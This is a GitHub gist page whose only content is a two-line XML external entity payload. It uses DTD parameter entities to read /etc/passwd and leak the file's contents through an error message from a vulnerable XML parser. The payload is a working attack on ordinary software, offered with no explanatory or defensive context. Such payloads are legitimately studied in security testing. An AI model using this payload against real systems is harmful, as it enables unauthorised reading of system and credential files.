Skip to content

Instantly share code, notes, and snippets.

@MaxNad
Created January 24, 2019 19:31
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save MaxNad/7c7cd435fcf2162bdbcc46a7bd676962 to your computer and use it in GitHub Desktop.
Save MaxNad/7c7cd435fcf2162bdbcc46a7bd676962 to your computer and use it in GitHub Desktop.
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 '<!ENTITY &#x25; external SYSTEM "file:///nothere/%payload;">'> %param1; %external;
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment